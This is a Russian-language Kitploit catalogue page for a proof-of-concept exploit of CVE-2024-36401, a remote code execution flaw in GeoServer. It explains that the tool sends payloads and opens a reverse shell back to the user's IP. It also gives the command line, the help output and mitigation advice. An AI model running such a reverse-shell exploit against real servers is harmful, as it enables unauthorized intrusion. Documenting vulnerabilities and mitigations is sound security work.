Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-36401 — POC для CVE-2024-36401. Этот POC попытается установить обратный шелл с уязвимых целей. | Kitploit
Инструменты/GitHubGitHub/bigb0x/cve-2024-36401
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubbigb0x/cve-2024-36401

CVE-2024-36401

POC для CVE-2024-36401. Этот POC попытается установить обратный шелл с уязвимых целей.

Репозиторий
341512 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

RCE для CVE-2024-36401

POC для CVE-2024-36401 GeoServer. Этот POC попытается установить обратную системную оболочку с целевых систем.

Banner

Обзор

POC для CVE-2024-36401: RCE для GeoServer версий до 2.25.1, 2.24.3 и 2.23.5. Этот POC основан на информационном бюллетене безопасности от phith0n.

Как это работает

  1. Настраивает прослушиватель на вашей машине для входящей обратной оболочки от цели.
  2. Этот POC отправит POST-запрос с полезными нагрузками.
  3. Пытается установить оболочку на целевом сервере.
  4. Этот метод предполагает, что на цели установлен nc.

Как использовать

Этот POC попытается установить обратную оболочку с уязвимых целей. Он предназначен для работы с уязвимыми целями на Linux. Для запуска этого POC вам понадобится машина с опубликованным и доступным IP-адресом.

Минимальные требования

  • Python 3.6 или выше
  • библиотека requests

Чтобы использовать этот POC против одной цели:

root@kitploit:~
python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type

Справка:

root@kitploit:~
python3 CVE-2024-36401.py  -h

options:
  -h, --help  show this help message and exit
  -u U        Target, example https://target:8080
  -ip IP      Your IP, example 192.168.1.1
  -port PORT  Port, example 1337
  -type TYPE  Type, example sf:archsites

Как защитить ваш экземпляр GeoServer

1- Отключите WFS-запросы.

2- Защитите вашу Linux-систему, настроив iptables для блокировки обратных соединений, установив политики по умолчанию на отклонение всего трафика, разрешив установленные и связанные соединения, и разрешив только необходимый исходящий трафик, такой как DNS, HTTP и HTTPS.

3- Или обновитесь до последней версии GeoServer.

Контакты

По любым предложениям или замечаниям, пожалуйста, свяжитесь со мной.

Отказ от ответственности

Мне нравится создавать собственные инструменты для развлечения, работы и только в образовательных целях. Я не поддерживаю и не поощряю взлом или несанкционированный доступ к любым системам или сетям. Пожалуйста, используйте мои инструменты ответственно и только на тех системах, где у вас есть явное разрешение на тестирование.

Скачать инструмент